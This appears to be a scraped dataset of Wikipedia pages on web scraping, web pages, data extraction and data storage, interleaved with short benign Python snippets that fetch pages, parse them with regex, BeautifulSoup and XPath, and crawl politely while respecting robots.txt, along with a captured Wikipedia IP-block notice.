A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
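The entry above mentions that a simple but powerful form of web scraping is regular-expression matching over fetched HTML. The sketch below shows that approach with the requests and re modules already imported in this notebook; the URL and the pattern (absolute href targets) are placeholders for illustration, not part of the source text.

# Regex-based extraction sketch: fetch a page over HTTP and pull out matches
# with Python's re module, the "grep-style" approach described above.
import re
import requests

url = "https://example.com"  # placeholder URL
try:
    html = requests.get(url, timeout=10).text
    links = re.findall(r'href="(https?://[^"]+)"', html)
    print(f"Found {len(links)} absolute links on {url}")
    for link in links[:10]:
        print(link)
except requests.RequestException as e:
    print(f"Request failed: {e}")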
624 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_page | A web page (or webpage) is a document on the Web that is accessed in a web browser. 1 A website typically consists of many web pages linked together under a common domain name. The term "web page" is thus a metaphor of paper pages bound together into a book. Each web page is identified by a distinct Uniform Resource Locator (URL). When the user inputs a URL into their web browser, the browser retrieves the necessary content from a web server and then transforms it into an interactive visual representation on the user's screen. 2 If the user clicks or taps a link, the browser repeats this process to load the new URL, which could be part of the current website or a different one. The browser has features, such as the address bar, that indicate which page is displayed. A web page is a structured document. The core element is a text file written in the HyperText Markup Language (HTML). This specifies the content of the page, 3 including images and video. Cascading Style Sheets (CSS) specify the presentation of the page. 3 CSS rules can be in separate text files or embedded within the HTML file. The vast majority 4 of pages have JavaScript programs, enabling a wide range of behavior. 3 The newer WebAssembly language can also be used as a supplement. 5 The most sophisticated web pages, known as web apps, combine these elements in a complex manner. From the perspective of server-side website deployment, there are two types of web pages: static and dynamic. Static pages are retrieved from the web server's file system without any modification, 6 while dynamic pages must be created by the server on the fly, typically reading from a database to fill out a template, before being sent to the user's browser. 7 An example of a dynamic page is a search engine results page. |
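The entry above describes the anatomy of a web page: an HTML text file, CSS for presentation, and JavaScript for behavior. As a small, hedged illustration of that structure, the sketch below fetches a page and counts those building blocks with BeautifulSoup and the html5lib parser installed at the top of this notebook; the URL is a placeholder and any publicly reachable page should behave similarly.

# Page-anatomy sketch: count the HTML, CSS, and JavaScript components of a
# fetched page, matching the description of web page structure above.
import requests
from bs4 import BeautifulSoup

url = "https://example.com"  # placeholder URL
try:
    soup = BeautifulSoup(requests.get(url, timeout=10).text, "html5lib")
    stylesheets = soup.find_all("link", rel="stylesheet")
    inline_styles = soup.find_all("style")
    scripts = soup.find_all("script")
    print("Title:", soup.title.string if soup.title else "(none)")
    print("External stylesheets:", len(stylesheets))
    print("Inline <style> blocks:", len(inline_styles))
    print("<script> elements:", len(scripts))
except requests.RequestException as e:
    print(f"Request failed: {e}")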
625 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-29 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
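This entry also describes parsing pages into a DOM tree and selecting content with XPath. The sketch below shows that technique with lxml, which is an extra dependency (pip install lxml) not installed at the top of this notebook; the URL and XPath expressions are placeholders for illustration only.

# DOM/XPath sketch: build a DOM tree from fetched HTML and select headings
# and link targets with XPath expressions, as described above.
import requests
from lxml import html  # extra dependency: pip install lxml

url = "https://example.com"  # placeholder URL
try:
    tree = html.fromstring(requests.get(url, timeout=10).content)
    headings = tree.xpath("//h1/text() | //h2/text()")
    link_targets = tree.xpath("//a/@href")
    print("Headings:", [h.strip() for h in headings if h.strip()])
    print("First few link targets:", link_targets[:5])
except requests.RequestException as e:
    print(f"Request failed: {e}")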
626 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Introduction | Wikipedia is made by people like you. Get started Policies and Guidelines Editing Referencing Images Tables Editing Referencing Images Tables Talk pages Navigating WikipediaManual of StyleConclusion View all as single page For more training information, see also: Full help contents page Training for students A single-page guide to contributing A training adventure game Resources for new editors |
627 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=8 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
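The block notice captured above is the practical consequence of the defensive measures mentioned in the web-scraping entries (rate limits, IP blocks). The sketch below is one hedged way to crawl more politely: consult robots.txt and pause between requests. It uses the time and requests modules already loaded in this notebook plus the standard-library urllib.robotparser; the user-agent string is a placeholder, and the paths are simply pages this notebook already targets.

# Polite-crawling sketch: honor robots.txt and throttle requests so the crawl
# stays well below the request rates that typically trigger blocks.
import time
import urllib.robotparser
import requests

base_url = "https://en.wikipedia.org"
user_agent = "example-research-bot"  # placeholder identifier

rp = urllib.robotparser.RobotFileParser()
rp.set_url(base_url + "/robots.txt")
rp.read()

pages = ["/wiki/Web_scraping", "/wiki/Data_scraping"]
for path in pages:
    if rp.can_fetch(user_agent, base_url + path):
        response = requests.get(base_url + path, timeout=10,
                                headers={"User-Agent": user_agent})
        print(path, response.status_code, len(response.text), "bytes")
    else:
        print(path, "disallowed by robots.txt")
    time.sleep(2)  # throttle: roughly one request every couple of seconds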
628 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_extraction | Data extraction is the act or process of retrieving data out of (usually unstructured or poorly structured) data sources for further data processing or data storage (data migration). The import into the intermediate extracting system is thus usually followed by data transformation and possibly the addition of metadata prior to export to another stage in the data workflow. Usually, the term data extraction is applied when (experimental) data is first imported into a computer from primary sources, like measuring or recording devices. Today's electronic devices will usually present an electrical connector (e.g. USB) through which 'raw data' can be streamed into a personal computer. Typical unstructured data sources include web pages, emails, documents, PDFs, social media, scanned text, mainframe reports, spool files, multimedia files, etc. Extracting data from these unstructured sources has grown into a considerable technical challenge, where as historically data extraction has had to deal with changes in physical hardware formats, the majority of current data extraction deals with extracting data from these unstructured data sources, and from different software formats. This growing process of data extraction from the web is referred to as "Web data extraction" or "Web scraping". The act of adding structure to unstructured data takes a number of forms |
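The entry above describes data extraction as pulling structured records out of unstructured sources and then transforming them and adding metadata. A minimal sketch of that workflow, using re, time, and pandas from this notebook's setup; the sample text and the metadata fields are invented for illustration.

# Extraction sketch: find structured values (email addresses) in unstructured
# text, then attach simple metadata before handing the rows downstream.
import re
import time
import pandas as pd

unstructured_text = "Contact alice@example.com for data; bob@example.org handles reports."

emails = re.findall(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}", unstructured_text)
extracted = pd.DataFrame({
    "email": emails,
    "source": "sample_note",                    # metadata: where the text came from
    "extracted_at": time.strftime("%Y-%m-%d"),  # metadata: when it was extracted
})
print(extracted)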
629 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_storage | Data storage is the recording (storing) of information (data) in a storage medium. Handwriting, phonographic recording, magnetic tape, and optical discs are all examples of storage media. Biological molecules such as RNA and DNA are considered by some as data storage. 1 2 Recording may be accomplished with virtually any form of energy. Electronic data storage requires electrical power to store and retrieve data. Data storage in a digital, machine-readable medium is sometimes called digital data. Computer data storage is one of the core functions of a general-purpose computer. Electronic documents can be stored in much less space than paper documents. 3 Barcodes and magnetic ink character recognition (MICR) are two ways of recording machine-readable data on paper. A recording medium is a physical material that holds information. Newly created information is distributed and can be stored in four storage media print, film, magnetic, and optical and seen or heard in four information flows telephone, radio and TV, and the Internet 4 as well as being observed directly. Digital information is stored on electronic media in many different recording formats. With electronic media, the data and the recording media are sometimes referred to as "software" despite the more common use of the word to describe computer software. With (traditional art) static media, art materials such as crayons may be considered both equipment and medium as the wax, charcoal or chalk material from the equipment becomes part of the surface of the medium. Some recording media may be temporary either by design or by nature. Volatile organic compounds may be used to preserve the environment or to purposely make data expire over time. Data such as smoke signals or skywriting are temporary by nature. Depending on the volatility, a gas (e.g. atmosphere, smoke) or a liquid surface such as a lake would be considered a temporary recording medium if at all. A 2003 UC Berkeley report estimated that about five exabytes of new information were produced in 2002 and that 92% of this data was stored on hard disk drives. This was about twice the data produced in 2000. 5 The amount of data transmitted over telecommunication systems in 2002 was nearly 18 exabytes—three and a half times more than was recorded on non-volatile storage. Telephone calls constituted 98% of the telecommunicated information in 2002. The researchers' highest estimate for 